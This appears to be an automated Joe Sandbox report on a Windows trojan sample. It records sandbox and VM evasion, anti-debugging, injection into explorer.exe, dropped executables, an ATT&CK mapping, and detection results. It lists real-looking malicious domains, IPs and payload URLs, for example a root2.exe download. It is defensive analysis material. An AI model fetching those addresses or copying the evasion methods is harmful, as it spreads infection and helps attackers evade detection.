                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000004426EB0 second address: 000000000442778E instructions:
                    0x00000000 rdtsc
                    0x00000002 mov dword ptr [ebp-0Ch], edx
                    0x00000005 mov dword ptr [ebp-24h], 0000000Dh
                    0x0000000c mov eax, 00000001h
                    0x00000011 cmp eax, 00000000h
                    0x00000014 jnbe 00007F9AF0396623h
                    0x00000016 mov eax, dword ptr [ebp-0Ch]
                    0x00000019 sub eax, dword ptr [ebp-04h]
                    0x0000001c cmp eax, dword ptr [ebp-24h]
                    0x0000001f jnl 00007F9AF039662Ah
                    0x00000021 inc dword ptr [ebp-14h]
                    0x00000024 jmp 00007F9AF0396C90h
                    0x00000029 mov eax, 00000000h
                    0x0000002e cmp eax, 00000000h
                    0x00000031 je 00007F9AF0396623h
                    0x00000033 cmp dword ptr [ebp-14h], 02h
                    0x00000037 jng 00007F9AF039685Ah
                    0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 644 | Thread sleep count: 652 > 30
                Source: C:\Windows\explorer.exe TID: 5544 | Thread sleep count: 1177 > 30
                Source: C:\Windows\explorer.exe TID: 5544 | Thread sleep time: -117700s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1104 | Thread sleep count: 1303 > 30
                Source: C:\Windows\explorer.exe TID: 1104 | Thread sleep time: -130300s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1320 | Thread sleep count: 487 > 30
                Source: C:\Windows\explorer.exe TID: 1276 | Thread sleep count: 1102 > 30
                Source: C:\Windows\explorer.exe TID: 1276 | Thread sleep time: -110200s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1332 | Thread sleep count: 1135 > 30
                Source: C:\Windows\explorer.exe TID: 1332 | Thread sleep time: -113500s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe TID: 2588 | Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\explorer.exe | Last function: Thread delayed
                Source: C:\Windows\explorer.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Thread delayed: delay time: 600000
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 652
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1177
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1303
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 487
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1102
                Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1135
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | File opened: PHYSICALDRIVE0
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0040D450 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_004235B0 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: WerFault.exe, 00000013.00000002.551745803.0000000004738000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh$
                Source: explorer.exe, 00000001.00000000.294130406.00000000045B0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.336477540.00000000081DD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
                Source: explorer.exe, 00000001.00000000.298060433.0000000006710000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.303121165.0000000008304000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 5AF.exe, 00000016.00000002.541764212.0000000002B75000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: K,<=;;?9:VMcI;8
                Source: explorer.exe, 00000001.00000000.268546487.00000000082B2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: explorer.exe, 00000001.00000000.268287568.0000000008200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\dfhwrav | System information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0207092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02070D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006FC2CB push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_025CA0A3 push dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402709 LdrLoadDll,

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe | File created: dfhwrav.1.dr
                Source: C:\Windows\explorer.exe | Domain query: thepokeway.nl
                Source: C:\Windows\explorer.exe | Network Connect: 123.253.32.170 80
                Source: C:\Windows\explorer.exe | Domain query: dowe.at
                Source: C:\Users\user\Desktop\file.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\file.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\Desktop\file.exe | Thread created: C:\Windows\explorer.exe EIP: 4E619E0
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Thread created: unknown EIP: 4FD19E0
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
                Source: explorer.exe, 00000001.00000000.298015850.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268820967.000000000833A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: ADCA.exe, 0000000A.00000003.437793710.000000007F700000.00000004.00001000.00020000.00000000.sdmp, ADCA.exe, 0000000A.00000003.450202572.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000000.455797744.0000000004041000.00000020.00000001.01000000.00000009.sdmp | Binary or memory string: MSASCui.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts11
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium11
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts312
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory123
                System Information Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth21
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
                Software Packing
                NTDS331
                Security Software Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer124
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets141
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion
                Cached Domain Credentials3
                Process Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
                Process Injection
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Hidden Files and Directories
                Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Rundll32
                Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Behavior Graph ID: 756294 | Sample: file.exe | Startdate: 30/11/2022 | Architecture: WINDOWS | Score: 100
                Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
                Root processes: file.exe; dfhwrav; 5AF.exe
                file.exe signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process
                file.exe injected: explorer.exe
                dfhwrav signatures: Machine Learning detection for dropped file; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
                explorer.exe (injected) DNS/IP: 123.253.32.170, 49725, 80 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Malaysia; thepokeway.nl 5.135.247.111, 443, 49739 OVHFR France; 5 other IPs or domains
                explorer.exe (injected) dropped: C:\Users\user\AppData\Roaming\dfhwrav, PE32; C:\Users\user\AppData\Local\Temp\ADCA.exe, PE32; C:\Users\user\AppData\Local\Temp\5AF.exe, PE32; C:\Users\user\...\dfhwrav:Zone.Identifier, ASCII
                explorer.exe (injected) signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
                explorer.exe (injected) started: ADCA.exe; 5AF.exe
                ADCA.exe dropped: C:\Users\user\AppData\...\Serpodtudpwhhta.dll, PE32
                ADCA.exe signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Machine Learning detection for dropped file
                ADCA.exe started: rundll32.exe
                rundll32.exe signatures: Tries to detect virtualization through RDTSC time measurements
                rundll32.exe started: WerFault.exe; WerFault.exe

                Source | Detection | Scanner | Label
                file.exe | 34% | Virustotal
                file.exe | 100% | Joe Sandbox ML
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\dfhwrav | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\ADCA.exe | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\5AF.exe | 100% | Joe Sandbox ML
                Source | Detection | Scanner | Label
                0.3.file.exe.2080000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                9.2.dfhwrav.6d0e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                22.2.5AF.exe.23be12c.2.unpack | 100% | Avira | TR/Patched.Ren.Gen7
                0.2.file.exe.2070e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                9.2.dfhwrav.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                9.3.dfhwrav.2080000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                16.2.5AF.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                22.2.5AF.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                Source | Detection | Scanner | Label
                thepokeway.nl | 5% | Virustotal
                dowe.at | 0% | Virustotal
                Source | Detection | Scanner | Label
                http://piratia.su/tmp/ | 100% | URL Reputation | malware
                http://piratia.su/tmp/ | 100% | URL Reputation | malware
                https://thepokeway.nl/upload/index.php | 0% | URL Reputation | safe
                http://cracker.biz/tmp/ | 0% | URL Reputation | safe
                http://cracker.biz/tmp/ | 0% | URL Reputation | safe
                http://123.253.32.170/root2.exe | 0% | URL Reputation | safe
                http://newhorizonswv.com/tmp/ | 1% | Virustotal
                http://xisac.com/tmp/ | 1% | Virustotal
                http://dowe.at/tmp/ | 0% | Avira URL Cloud | safe
                http://xisac.com/tmp/ | 0% | Avira URL Cloud | safe
                http://newhorizonswv.com/tmp/ | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                thepokeway.nl | 5.135.247.111 | true | true | | unknown
                dowe.at | 200.46.66.71 | true | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://piratia.su/tmp/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://newhorizonswv.com/tmp/ | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
                https://thepokeway.nl/upload/index.php | false | URL Reputation: safe | unknown
                http://cracker.biz/tmp/ | true | URL Reputation: safe; URL Reputation: safe | unknown
                http://123.253.32.170/root2.exe | true | URL Reputation: safe | unknown
                http://piratia-life.ru/tmp/ | false | | high
                http://dowe.at/tmp/ | true | Avira URL Cloud: safe | unknown
                http://xisac.com/tmp/ | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.autoitscript.com/autoit3/J | explorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                IP | Domain | Country | ASN | ASN Name | Malicious
                5.135.247.111 | thepokeway.nl | France | 16276 | OVHFR | true
                201.124.230.1 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
                123.253.32.170 | unknown | Malaysia | 9924 | TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi | true
                211.59.14.90 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
                200.46.66.71 | dowe.at | Panama | 18809 | CableOndaPA | true
                187.212.179.75 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
                    IP
                    192.168.2.1
                    Joe Sandbox Version: 36.0.0 Rainbow Opal
                    Analysis ID: 756294
                    Start date and time: 2022-11-30 00:09:06 +01:00
                    Joe Sandbox Product: CloudBasic
                    Overall analysis duration: 0h 13m 15s
                    Hypervisor based Inspection enabled: false
                    Report type: light
                    Sample file name: file.exe
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of new started processes analysed: 23
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Detection: MAL
                    Classification: mal100.troj.expl.evad.winEXE@13/9@36/7
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 22.1% (good quality ratio 11.6%)
                    • Quality average: 30.8%
                    • Quality standard deviation: 33.9%
                    HCA Information:
                    • Successful, ratio: 67%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240s for rundll32
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                    • Not all processes were analyzed; the report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    00:10:59 | Task Scheduler | Run new task: Firefox Default Browser Agent F98CC62F1FC24C40 path: C:\Users\user\AppData\Roaming\dfhwrav
                    00:12:07 | API Interceptor | 1x Sleep call for process: 5AF.exe modified
                    00:12:20 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                    No context
                    Process: C:\Windows\SysWOW64\WerFault.exe
                    File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category: dropped
                    Size (bytes): 65536
                    Entropy (8bit): 0.946006514417489
                    Encrypted: false
                    SSDEEP: 192:cfiw0oXVHqqBIKjed+Mb/u7s9S274ItWc:UimXFqqBIKjet/u7s9X4ItWc
                    MD5: D7A37DE7937004741090755840C56D79
                    SHA1: 08CE77055D65D3FB07F4642E33D2F2FE9FA7F068
                    SHA-256: E9915E6CFE487068FD5A96B376F5EE8D9DAAE0D1E992844CF29320ED14B2E658
                    SHA-512: 57B5F8721B439B74F09FA5700C08ACE11645FE3D0342F8FEC4D13350A6C1F7971E92B369FF069AA3D6CDE41CDE4039F46A7C5B3088E92CEBF312EDB776A268AA
                    Malicious: false
                    Reputation: low
                    Process: C:\Windows\SysWOW64\WerFault.exe
                    File Type: Mini DuMP crash report, 14 streams, Wed Nov 30 08:12:12 2022, 0x1205a4 type
                    Category: dropped
                    Size (bytes): 46956
                    Entropy (8bit): 2.1379555772918506
                    Encrypted: false
                    SSDEEP: 192:/WFLAtpZkO5SkbAR+TPZQfDx0+Kyrx+p9R6NnX:ikr5Lbw+T810+KyreW
                    MD5: 52C8A7752FFF58EDBB70514842507A1C
